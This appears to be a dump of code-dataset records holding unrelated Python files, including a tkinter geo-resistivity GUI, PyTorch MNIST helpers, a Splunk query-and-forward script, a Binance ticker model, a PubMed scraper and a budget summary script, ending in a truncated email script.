ImageTk.PhotoImage(Image.open(\"figure/energia3.png\"))\n Label(tab1, image=logo_image1).place(x=5, y=5)\n Label(tab1,text = \"Geo-Resistivity-Meter\",font=my_font1).place(x=90, y= 10)\n\n Frame(tab1, width=350, height=150, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=5, y=80)\n Frame(tab1, width=350, height=280, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=5, y=250)\n Frame(tab1, width=616, height=450, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=375, y=80)\n Frame(tab1, width=590, height=140, background=\"white\", highlightbackground=\"black\", highlightthickness=2).place(x=390, y=380)\n\n Label(tab1,text = \"Help\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=8, y=83)\n Label(tab1,text = \"About\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=8, y=253)\n Label(tab1,text = \"Start\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=378, y=83)\n \n def click1():\n webbrowser.open_new(r\"https://github.com/LDSM-ON/Geo-Resistivity-meter\")\n def click2():\n webbrowser.open_new(r\"https://www.gov.br/observatorio/pt-br\")\n \n logo_git = ImageTk.PhotoImage(Image.open(\"figure/git.png\"))\n Label(tab1, image=logo_git).place(x=20, y=130)\n logo_caution = ImageTk.PhotoImage(Image.open(\"figure/caution.png\"))\n \n \n Label(tab1,text = \"Geo-Resistivity-Meter \\n Hardware and software repository \\n for a geophysical instrument \\n Made at the\",bg= \"#dce6f4\",font=('helvetica', 11)).place(x=65, y=291)\n \n Button(tab1,text = \"Help Home\",bd=0,bg= \"#dce6f4\",command=click1,foreground='blue',font=('helvetica', 11, 'underline')).place(x=40, y=125)\n Button(tab1,text = \"Report Problems\",bd=0,bg= \"#dce6f4\",command=click1,foreground='blue',font=('helvetica', 11, 'underline')).place(x=40, y=150)\n\n Button(tab1,text = \"Observatório Nacional\",bd=0,bg= \"#dce6f4\",command=click2,foreground='blue',font=('helvetica', 11, 'underline italic')).place(x=100, y=359)\n Label(tab1,text = \"with help from the open-source community \\n Raspberry Pi and Arduino \\n it is free software and you are welcome \\n to distribute it under certain conditions see.\",bg= \"#dce6f4\",font=('helvetica', 11)).place(x=30, y=381)\n \n Label(tab1, text = \"Software version: 1.0 \\n Python version: %s \\n \" % platform.python_version() + \"tkinter version: %d\" % tkinter.TkVersion,bg= \"#dce6f4\",font=('helvetica', 11)).place(x=100, y=450)\n\n labelframe = LabelFrame(tab1, text=\"Project Name\",bg='#dce6f4',font=my_font2)\n labelframe.place(x=390, y=130)\n\n labelframe2 = LabelFrame(tab1, text=\"Settings\",bg='#dce6f4',font=my_font2)\n labelframe2.place(x=390, y=225)\n\n labelframe3 = LabelFrame(tab1, text=\"Monitoring\",bg='#dce6f4',font=my_font2)\n labelframe3.place(x=390, y=295)\n\n labelframe4 = LabelFrame(tab1, text=\"Loop\",bg='#dce6f4',font=my_font2)\n labelframe4.place(x=390, y=286)\n\n \n def selectPath(): \n path_ = askdirectory()\n path.set(path_)\n \n def create_file():\n dirs = os.path.join(path.get(), folder.get())\n if not os.path.exists(dirs):\n os.makedirs(dirs)\n tkinter.messagebox.showinfo('Tips:','Pasta criado com sucesso!')\n \n path = StringVar() # Receiving user's file_path selection\n folder = StringVar() # Receiving user's folder_name selection\n numberChosen2 = IntVar() # Numero de eletrodos\n AB = StringVar()\n na = StringVar()\n \n Name_label = Label(labelframe,text = \"Name:\",bg='#dce6f4',font=my_font2).grid(row=0,column=0)\n Name_entry = Entry(labelframe,width=68,bd=2, textvariable=folder).grid(row=0,column=1,padx=10,pady=4)\n Path_label = Label(labelframe,text = \"Path:\",bg='#dce6f4',font=my_font2).grid(row=1,column=0)\n Path_entry = Entry(labelframe,width=68,bd=2, textvariable = path).grid(row=1,column=1,padx=10,pady=4)\n Button(labelframe, text = \"Browse \", command = selectPath, width=8, height=1,font=my_font2).grid(row=1,column=2,padx=3,pady=4)\n \n Label(labelframe2,text='Arranjo',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=8,padx=3,pady=4)\n \n arranjo = ttk.Combobox(labelframe2 ,state=\"readonly\",width=12,height=40,font=('helvetica', 16, 'bold'))\n arranjo['values'] = [\"Dipolo-Dipolo\", \"Wernner\", \"Schlumberger\", \"Pólo-Dipolo\"]\n arranjo['state'] = 'readonly'\n arranjo.set(\"\")\n arranjo.grid(row=0,column=9,padx=3,pady=4)\n \n # bind the selected value changes\n def arranjo_changed():\n if arranjo.get() == \"Schlumberger\":\n print(\"Schlumberger\")\n \n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Dipolo-Dipolo >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> \n if arranjo.get() == \"Dipolo-Dipolo\":\n \n sys.path.append((os.path.relpath('../src'))) # add here the relative path of the API folder\n testdir = \"../src/examples/dc-2d/\"\n from resipy import Project\n k = Project(typ='R2') # create a Project object in a working directory (can also set using k.setwd())\n k.createSurvey(testdir + 'root_file.csv', ftype='Syscal') # read the survey file\n \n \n # Function to redirect standard output to a text widget in Tkinter\n class StdoutRedirector:\n def __init__(self, text_widget):\n self.text_widget = text_widget\n self.output = StringIO()\n\n def write(self, text):\n self.output.write(text)\n self.text_widget.insert(END, text)\n self.text_widget.see(END)\n\n # Create Tkinter main window\n \n # Create a text widget to display the output\n output_text = Text(tab1, width=62, height=8)\n output_text.place(x=392, y=381)\n \n \n\n sys.stdout = StdoutRedirector(output_text)\n\n \n now = datetime.now()\n date_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n \n \n \n print(\"<<<<<<<<<<<<<<<<<<<< START OF SURVEY >>>>>>>>>>>>>>>>\")\n print(\"\")\n print(\"<<<<<<<<<<<<<<<<<<<< \"+date_time+\" >>>>>>>>>>>>>>>>>\")\n\n # Function to display the output\n \n \n k.filterUnpaired()\n k.fitErrorLin() \n k.createMesh(typ='quad') # generate quadrilateral mesh (default for 2D survey)\n k.showMesh() \n k.param['data_type'] = 1 # using log of resistitivy\n k.err = True # if we want to use the error from the error models fitted before\n k.invert() # this will do the inversion\n \n \n def create_folder_and_save(df, path, folder_name):\n \n global file_path\n # Get the current date and time\n current_time_date = datetime.now().strftime(\"%d%m%Y_%H%M%S\")\n \n folder_path = os.path.join(path, folder_name + \"_\" + current_time_date)\n os.makedirs(folder_path, exist_ok=True)\n\n # Save the file inside the folder\n file_path = os.path.join(folder_path, folder_name + \"_\" + current_time_date + \".csv\")\n df.to_csv(file_path, index=False)\n return file_path\n\n # ...\n\n # Here should be the path of the root file that contains the measurement data\n \n df = pd.read_csv('root_file.csv')\n \n create_folder_and_save(df, path.get(), folder.get())\n \n\n \n # delete space at end and beginning of column names\n headers = df.columns#create a worksheet headers list\n if 'Spa.1' in headers:\n newheaders = list(map(str.strip, headers)) \n dico = dict(zip(headers, newheaders))\n df = df.rename(index=str, columns=dico)\n df = df.rename(columns={'Spa.1':'a',\n 'Spa.2':'b',\n 'Spa.3':'m',\n 'Spa.4':'n',\n 'Rho_a':'Rho_a',\n 'In':'I(mA)',\n 'Vp':'vp',\n 'Dev.':'dev',\n 'M':'ip',\n 'Sp':'sp'})\n \n frame = Frame(tab2)\n frame.pack()\n \n pt = Table(frame, dataframe=df) \n table = pt = Table(frame, dataframe=df,showtoolbar=True, showstatusbar=True,width=890, height=480)\n pt.show()\n \n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n k.showPseudo(ax=ax)\n\n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab3)\n canvas.draw()\n canvas.get_tk_widget().pack()\n \n #=====================================\n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n k.fitErrorLin(ax=ax)\n\n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab4)\n canvas.draw()\n canvas.get_tk_widget().pack()\n \n \n #=====================================\n # Get the current date and time\n current_time_date = datetime.now().strftime(\"%d%m%Y_%H%M%S\")\n \n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n \n k.showResults(attr='Resistivity(ohm.m)', sens=False, contour=True, vmin=30, vmax=100,ax=ax)\n \n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab5)\n canvas.draw()\n canvas.get_tk_widget().pack()\n\n # Full path to image file\n caminho_imagem = os.path.join(file_path, file_path + \"_\" + current_time_date + \".jpg\") # Replace with the desired file name\n\n # Save the canvas as a PNG image in the destination folder\n fig.savefig(caminho_imagem)\n print(\"\")\n print(path.get()+\"/\"+folder.get())\n \n \n \n print(\"<<<<<<<<<<<<<<<<<<<< \"+date_time+\" >>>>>>>>>>>>>>>>>\")\n print(\"\")\n print(\"<<<<<<<<<<<<<<<<<<<<<<< END OF SURVEY >>>>>>>>>>>>>>>>>>>\")\n \n \n \n \n numberChosen2 = ttk.Combobox(labelframe2, values=[\"24\",\"48\",\"72\"],state=\"readonly\",width=3,height=40,font=('helvetica', 14, 'bold'))\n numberChosen2.grid(row=0,column=1)\n numberChosen2.set(\"24\")\n \n numberChosen3 = ttk.Combobox(labelframe4, values=[\"no loop\",\"15 segundos\", \"30 segundos\", \"1 horas\", \"24 horas\"],state=\"readonly\", width=19,height=50,font=('helvetica', 16, 'bold'))\n numberChosen3.set(\"no loop\")\n numberChosen3.grid(row=0,column=0,padx=4,pady=4)\n\n N_elec_label = Label(labelframe2,text='N_elec: ',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=0,padx=3,pady=4)\n \n A_label = Label(labelframe2,text='AB: ',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=2,padx=3,pady=4)\n A_entry = Entry(labelframe2,bd=2,width=3,font=my_font2,textvariable = AB,bg='yellow').grid(row=0,column=3,padx=3,pady=4)\n \n na_label = Label(labelframe2,text='na: ',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=6,padx=3,pady=4)\n na_entry = Entry(labelframe2,bd=2,width=3,font=my_font2,textvariable = na,bg='yellow').grid(row=0,column=7,padx=3,pady=4)\n \n def rep():\n if numberChosen3.get() == \"no loop\":\n arranjo_changed()\n if numberChosen3.get() == \"15 segundos\":\n for i in range(3):\n arranjo_changed()\n time.sleep(15)\n \n \n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n \n Button(labelframe4, text = \"TO UPDATE\", width=13, height=3).grid(row=0,column=1,padx=5,pady=4)\n Button(labelframe4, text = \"XXXXXX \", width=13, height=3).grid(row=0,column=2,padx=5,pady=4)\n Button(labelframe4, text = \"START\", command =rep,width=13, height=3).grid(row=0,column=3,padx=5,pady=4)\n \n\n\n \n root.mainloop()\n\n\n","sub_path":"jupyter-notebook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526462460","text":"import numpy as np\nimport warnings\nfrom math import fabs\n\nclass BCHandler():\n def __init__(self, BCType, BC0, BC1):\n self. BCType = BCType\n self.BC0 = BC0\n self.BC1 = BC1\n\n def impose_BC_on_side(self, A, rhs, idBoundary):\n n = np.shape(A)[0]\n if idBoundary == 0:\n idx = 0\n BCValue = self.BC0\n elif idBoundary == 1:\n idx = n-1\n BCValue = self.BC1\n else:\n warnings.warn('wrong idBoundary', idBoundary)\n exit(1)\n\n if self.BCType[idBoundary] == 'D':\n for j in range(n):\n if fabs(A[j, idx]) > 1.e-10:\n rhs[j] -= A[j, idx] * BCValue\n A[:, idx] = np.zeros(n)\n A[idx, :] = np.zeros(n)\n A[idx, idx] = 1.\n rhs[idx] = BCValue\n elif self.BCType[idBoundary] == 'N':\n rhs[idx] += BCValue\n elif self.BCType[idBoundary] == 'R':\n assert len(BCValue) == 2, 'not enough parameters; should be len 2 array'\n A[idx, idx] += BCValue[0]\n rhs[idx] += BCValue[0] * BCValue[1]\n else:\n warnings.warn('Unsupperted BC')\n exit(1)\n\n def impose_BC(self, A, rhs):\n self.impose_BC_on_side(A, rhs, 0)\n self.impose_BC_on_side(A, rhs, 1)\n\n\n\n\n\n","sub_path":"src/BC/BCHandler.py","file_name":"BCHandler.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"567464540","text":"from random import shuffle\nfrom typing import Tuple, Union\n\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision.datasets.mnist import MNIST\nfrom torchvision.transforms.transforms import Compose, Normalize, ToTensor\n\n\ndef get_mnist_dl(bs_train, bs_test, shuffle) -> Tuple[DataLoader, DataLoader]:\n transform = Compose(\n [\n ToTensor(),\n Normalize((0,), (1,)),\n ]\n )\n\n train_loader = DataLoader(\n MNIST(\n \".tmp\",\n train=True,\n download=True,\n transform=transform,\n ),\n batch_size=bs_train,\n shuffle=shuffle,\n )\n\n test_loader = DataLoader(\n MNIST(\n \".tmp\",\n train=False,\n download=True,\n transform=transform,\n ),\n batch_size=bs_test,\n shuffle=shuffle,\n )\n\n return train_loader, test_loader\n\n\nclass MapDataset(Dataset):\n def __init__(self, transform, data: Union[Dataset, DataLoader]) -> None:\n super().__init__()\n self.transform = transform\n self.data = data\n self.it = None\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n return (self.transform(b, i) for i, b in enumerate(self.data))\n\n\nclass CachedDataset:\n def __init__(self, data: Union[Dataset, DataLoader], shuffle=False) -> None:\n \"\"\"Used to generate cached version of a datamodule. Yield once\n and then yields from the cache. Kind of designed to be used in\n a single thread. Consider the chainging state in the iterator.\n\n Args:\n data (Union[Dataset, DataLoader]): Dataloader/set to get the data from\n shuffle (bool, optional): Shuffle the cache buffer on every iteration.\n Defaults to False.\n \"\"\"\n self.buffer = []\n self.data = data\n self.shuffle = shuffle\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n if len(self.buffer) > 0:\n if self.shuffle:\n shuffle(self.buffer)\n for b in self.buffer:\n yield b\n else:\n for b in self.data:\n self.buffer.append(b)\n yield b\n\n\nclass ParamCompose(nn.Module):\n \"\"\"Compose multiple modules that can yield be forwarded to yield the\n parameters of random transformation. This is needed because we might\n want to do this transformation multiple times.\n\n Used to forward parameters of random transformations\n of `kornia` augmentation modules.\n \"\"\"\n\n def __init__(self, functions):\n super().__init__()\n self.functions = nn.ModuleList(functions)\n\n def forward(self, inp, params=None):\n if params is None:\n params = [None] * len(self.functions)\n\n for f, p in zip(self.functions, params):\n inp = f(inp, p)\n\n return inp\n\n def forward_parameters(self, shape, device=\"cpu\"):\n params = []\n for f in self.functions:\n p = f.forward_parameters(shape)\n pp = {}\n for k, v in p.items():\n pp[k] = v.to(device)\n params.append(pp)\n\n return params\n","sub_path":"ez_torch/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289822187","text":"num = num_par = ()\nnum_prt = (\"um\", \"outro\", \"mais um\", \"o último\")\nlista_num = list(num)\nlista_num_par = list(num_par)\nfor i in range(0, len(num_prt)):\n n = int(input(f\"Digite {num_prt[i]} número: \"))\n lista_num.append(n)\n if n % 2 == 0:\n lista_num_par.append(n)\nnum = tuple(lista_num)\nnum_par = tuple(lista_num_par)\nprint(f\"Você digitou os valores {num}\")\nprint(f\"O Valor 9 apareceu {num.count(9)} vezes\")\nif 3 in num:\n print(f\"O valor 3 apareceu na {num.index(3) + 1}ª posição\")\nelse:\n print(\"O valor 3 não foi digitado em nenhuma posição\")\nprint(\"Os valores pares digitados foram \", end=\"\")\nfor i in range(0, len(num_par)):\n print(num_par[i], end=\" \")","sub_path":"desafios/aula16/exe04.py","file_name":"exe04.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427816396","text":"from src.models.base_symbol import BaseSymbol\n\n\ndef object_decoder(obj):\n return Ticker24hr(obj)\n\n\nclass Symbol:\n def __init__(self, symbol, price_change, price_change_percent, weighted_avg_price, prev_close_price, last_price,\n last_qty, bid_price, ask_price, open_price, high_price, low_price, volume, quote_volume, open_time,\n close_time, first_trade_id, last_trade_id, trade_count):\n self.symbol = symbol\n self.price_change = price_change\n self.price_change_percent = price_change_percent\n self.weighted_avg_price = weighted_avg_price\n self.prev_close_price = prev_close_price\n self.last_price = last_price\n self.last_qty = last_qty\n self.bid_price = bid_price\n self.ask_price = ask_price\n self.open_price = open_price\n self.high_price = high_price\n self.low_price = low_price\n self.volume = volume\n self.quote_volume = quote_volume\n self.open_time = open_time\n self.close_time = close_time\n self.first_trade_id = first_trade_id\n self.last_trade_id = last_trade_id\n self.trade_count = trade_count\n\n\nclass Ticker24hr(BaseSymbol):\n def __init__(self, symbols_data):\n self._symbols = self._create_symbols(symbols_data)\n\n @staticmethod\n def _create_symbols(symbols):\n if isinstance(symbols, dict):\n symbols = [symbols]\n\n return {symbol['symbol']: Symbol(symbol=symbol[\"symbol\"],\n price_change=symbol[\"priceChange\"],\n price_change_percent=symbol[\"priceChangePercent\"],\n weighted_avg_price=symbol[\"weightedAvgPrice\"],\n prev_close_price=symbol[\"prevClosePrice\"],\n last_price=symbol[\"lastPrice\"],\n last_qty=symbol[\"lastQty\"],\n bid_price=symbol[\"bidPrice\"],\n ask_price=symbol[\"askPrice\"],\n open_price=symbol[\"openPrice\"],\n high_price=symbol[\"highPrice\"],\n low_price=symbol[\"lowPrice\"],\n volume=symbol[\"volume\"],\n quote_volume=symbol[\"quoteVolume\"],\n open_time=symbol[\"openTime\"],\n close_time=symbol[\"closeTime\"],\n first_trade_id=symbol[\"firstId\"],\n last_trade_id=symbol[\"lastId\"],\n trade_count=symbol[\"count\"]) for symbol in symbols}\n","sub_path":"src/models/ticker_price.py","file_name":"ticker_price.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82081186","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport sys, os,re,json,time, socket,math,urllib2\n#from kafka import KafkaProducer\n#producer = KafkaProducer(bootstrap_servers='172.17.46.14:9092')\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\nfrom xml.etree import ElementTree\nimport splunklib.client as client\nimport splunklib.results as results\n\nHOST = \"localhost\"\nPORT =20157\nUSERNAME = \"\"\nPASSWORD = \"\"\nREPORTNAME=\"changeme\"\nAPPNAME = \"phoenix\"\nnow_time=time.time()\n\nservice = client.connect(\n host=HOST,\n port=PORT,\n username=USERNAME,\n password=PASSWORD,\n app=APPNAME)\n\njobs = service.jobs\n\n# calculate the time to start and stop, the rule is:\n# get the last 5 seconds data, ex: if now is 0:06, then start time is 0:01 and the end time is 0:05\nstart_time=(math.floor(now_time/5)*5)-5\nstop_time=math.floor(now_time/5)*5\n# start_time=\"-365d\"\nprint(int(now_time))\nprint(start_time)\nprint(stop_time)\n\n# start the search in splunk\nkwargs_search={\"exec_mode\": \"blocking\",\"earliest_time\":start_time,\"latest_time\":stop_time,'count':0}\n#search_string = \"search index=_internal user=* | head 21 | table user\"\nsearch_string = '|from datamodel:cupdata.apply | stats first(reason) as reason, first(src_ip) as src_ip, first(time) as time,first(fp_browser) as fp_browser,first(fp_mobile) as fp_mobile by path,page,id '\n#search_string = \"search index=access_log | head 21 | table src_ip\"\njob=jobs.create(search_string,**kwargs_search)\nrr = results.ResultsReader(job.results())\nresult_list=[]\nfor result in rr:\n result_list.append(json.dumps(result))\n\nkwargs_search_detailed={\"exec_mode\": \"blocking\",\"earliest_time\":start_time,\"latest_time\":stop_time,'count':0}\n#search_string = \"search index=_internal user=* | head 21 | table user\"\nsearch_string_detailed = '|from datamodel:cupdata_detailed.apply '\n#search_string = \"search index=access_log | head 21 | table src_ip\"\njob_detailed=jobs.create(search_string_detailed,**kwargs_search_detailed)\nrr_detailed = results.ResultsReader(job_detailed.results())\nresult_list_detailed=[]\nfor result_detailed in rr_detailed:\n result_list_detailed.append(json.dumps(result_detailed))\n\ndef send_result(input):\n time_str=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n #print(json.dumps(input))\n postdata = {\"body\":input,\n \"security\":\n {\n \"userPassword\":\"4B18E30759E8E1094CAAA72190165FA5\",\n \"userName\":\"rsfhadmin\",\n \"channel\":\"ddn\"\n },\n \"head\":\n {\n \"transDate\":time_str,\n \"orgCode\":\"1026\",\n \"transNo\":\"a2b9a30c29c54d80aea09b45\",\n \"transCode\":\"AM0088\"\n }\n }\n #print(postdata)\n #print(json.dumps(postdata))\n url=\"http://10.193.81.6:9456/\"\n req = urllib2.Request(url, postdata)\n return input\n\n\n# if len(result_list)>0:\n# result_str=\"[\\n\"\n# for ii in range(len(result_list)):\n# if ii%20==19:\n# #result_str+=result_list[ii]+\"]\\n\"\n# #send_result(result_str)\n# result_str=\"[\\n\"\n# ii+=1\n# elif ii==len(result_list)-1:\n# #result_str+=result_list[ii]+\"]\\n\"\n# #send_result(result_str)\n# result_str=\"[\\n\"\n# ii+=1\n# else:\n# #result_str+=result_list[ii]+\",\\n\"\n# ii+=1\n\n\n\nif len(result_list)>0:\n result_queue=[]\n for ii in range(len(result_list)):\n if ii%20==19 :\n result_queue.append(result_list[ii])\n print(result_queue)\n send_result(result_queue)\n result_queue=[]\n elif ii==len(result_list)-1:\n result_queue.append(result_list[ii])\n print(result_queue)\n send_result(result_queue)\n result_queue=[]\n else:\n result_queue.append(result_list[ii])\n #print(result_queue)\n\n\nif len(result_list_detailed)>0:\n result_queue_detailed=[]\n for ii in range(len(result_list_detailed)):\n if ii%20==19 :\n result_queue_detailed.append(result_list_detailed[ii])\n print(result_queue_detailed)\n send_result(result_queue_detailed)\n result_queue_detailed=[]\n elif ii==len(result_list_detailed)-1:\n result_queue.append(result_list_detailed[ii])\n print(result_queue_detailed)\n send_result(result_queue_detailed)\n result_queue_detailed=[]\n else:\n result_queue_detailed.append(result_list_detailed[ii])","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189749289","text":"import spidev\nimport time\n \n# A0 = 0, A1 = 1, A2 = 2, A3 =3 \ntemp_channel = 0\nprint (\"\\nKytke liittimeen A%1d\\n\" % temp_channel)\n#time.sleep(1)\n \nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\ndef readadc(adcnum):\n# read SPI data from MCP3004 chip, 4 possible adc's (0 thru 3)\n if adcnum > 3 or adcnum < 0:\n return -1\n r = spi.xfer2([1,8+adcnum <<4,0])\n adcout = ((r[1] &3) <<8)+r[2]\n return adcout\n \nwhile True:\n\tvalue = readadc(temp_channel) \n\tvolts = (value * 3.3) / 1024\n\ttemperature_C = (volts - 0.5) * 100\n\t#temperature_F = (temperature_C * 9 / 5) + 32\n \n\tprint(\"Jannitetaso = %5.3f V\" % volts )\n\tprint(\"%4.1f Celsiusastetta C\" % temperature_C)\n\t#print(\"%4.1f degrees F\" % temperature_F)\n\tprint(\"-------------------------\")\n\ttime.sleep(5)","sub_path":"lampo.py","file_name":"lampo.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437896444","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 27 11:17:39 2014\n\n@author: Axel\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup as bsoup\n\nr = requests.get('http://www.ncbi.nlm.nih.gov/pubmed/?term=gene+network')\ndoc = r.text\nwith open('fpubmed.html', \"w\") as fpubmed:\n fpubmed.write(doc)\n data = fpubmed.read \nsoup = bsoup(doc)\n#print(soup.title)\n#print(doc)\n\ncount = soup.find_all('meta', {'name':'ncbi_resultcount'})[0]\nprint(count.attrs)\nprint(count['content'])\narticle = soup.find_all('div', {'class':'rprt'})\n#article = soup.find_all('a', { \"linksrc\" : \"docsum_title\" })[0]\n#article = article.text\n#article = article.split()\n#print(article)\n\natitle = soup.find_all(id=\"maincontent\")\nprint(atitle)\n\n\nauthor = soup.find_all('p', { \"class\" : \"desc\" })[0]\nauthor = author.text\nauthor = author.split()\nprint(author)\n","sub_path":"youplaboum/747/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209262369","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 29 12:56:19 2016\n\n@author: sarath\n\"\"\"\nfrom flask import request, Response\nimport flask_restful\nfrom dial import Dial\n\n\nverbs_dict = {'dial' : Dial}\n\napi = flask_restful.Api()\nclass VerbHandler(flask_restful.Resource):\n @api.representation('text/plain')\n def get(self, verb):\n verb_class = verbs_dict.get(verb,Dial)\n query_dict = dict((param, request.args.get(param)) for param in verb_class.query_params)\n verb = verb_class(query_dict)\n return Response(verb.string(), mimetype='text/xml')\n\n @api.representation('text/plain')\n def post(self, verb):\n verb_class = verbs_dict.get(verb,Dial)\n query_dict = dict((param, request.args.get(param)) for param in Dial.query_params)\n verb = verb_class(query_dict)\n return Response(verb.string(), mimetype='text/xml')\n","sub_path":"verbservice/verb_handler.py","file_name":"verb_handler.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224427541","text":"def update_edges_traffic(positions,own_position,edges,teamname):\n for pos in positions:\n if pos[0] != teamname and pos[1] != pos[2]:\n if pos[2] == own_position[0]:\n edge = [x[2], x[1], get_edge_length([x[2], x[1]],edges)]\n if edges.count(edge) != 0:\n edges.remove(edge)\n continue\n if pos[1] == own_position[0] and pos[1] != pos[2]:\n try:\n i = edges.index([x[1], x[2],get_edge_length([x[1], x[2]], edges)])\n edge = edges.pop(i)\n edge[2] = edge[2]*2\n edges.insert(i, edge)\n except:\n pass\n return edges\ndef get_edge_length(edge, edges):\n for x in edges:\n if x[0] == edge[0] and x[1] == edge[1]:\n return x[2]\n return 0\n","sub_path":"BACKUPDEMO/updateEdgesTraffic.py","file_name":"updateEdgesTraffic.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419946896","text":"import os\nimport pandas as pd\n\n\n#Format Currency Function (Downloaded from Web)\ndef as_currency(amount):\n if amount >= 0:\n return '${:,.2f}'.format(amount)\n else:\n return '-${:,.2f}'.format(-amount)\n\n\n#Create two DataFrames\nbudgetData = pd.read_csv(\"budget_data.csv\")\ndeltaGross = budgetData[\"Profit/Losses\"].diff()\n\n\n#GetResults\nh1Month=budgetData[\"Date\"].count()\nh2Money=budgetData[\"Profit/Losses\"].sum()\nh3Mean=deltaGross.mean()\nh4Max = str(as_currency(deltaGross.max()))+\" on \" +str(budgetData.loc[deltaGross.idxmax(),\"Date\"])\nh4Min = str(as_currency(deltaGross.min()))+\" on \" +str(budgetData.loc[deltaGross.idxmin(),\"Date\"])\n#h4Max = str(budgetData[\"Profit/Losses\"].max())+\" on \" +str(budgetData.loc[budgetData[\"Profit/Losses\"].idxmax(),\"Date\"])\n\n\n#Print results to Screen\nprint(\"\\n\\nFinancial Analysis\")\nprint(\"______________________________________________________\")\nprint (f'Total Months: {h1Month}')\nprint (f'Total Net Revenue: {as_currency(h2Money)}')\nprint (f'Average Delta: {as_currency(h3Mean)}')\nprint (f'Highest Delta: {h4Max}')\nprint (f'Lowest Delta {h4Min}')\nprint(\"______________________________________________________\")\n\n#Print results to file\nToFile= open(\"GlennResults.txt\",\"w+\")\n\nToFile.write(\"Financial Analysis\\r\\n\")\nToFile.write(\"______________________________________________________\\r\\n\")\nToFile.write (f'Total Months: {h1Month}\\r\\n')\nToFile.write (f'Total Net Revenue: {as_currency(h2Money)}\\r\\n')\nToFile.write (f'Average Delta: {as_currency(h3Mean)}\\r\\n')\nToFile.write (f'Highest Delta: {h4Max}\\r\\n')\nToFile.write (f'Lowest Delta {h4Min}\\r\\n')\nToFile.write(\"______________________________________________________\\r\\n\")\n\nToFile.close()\n","sub_path":"pybank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621007331","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\n\nimport csv\nimport time\n\nimport requests\nimport os\n\ndef mail_babali_jiaji_csv():\n str_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n # 发邮件代码\n _user = \"lgang219@qq.com\"\n _pwd = 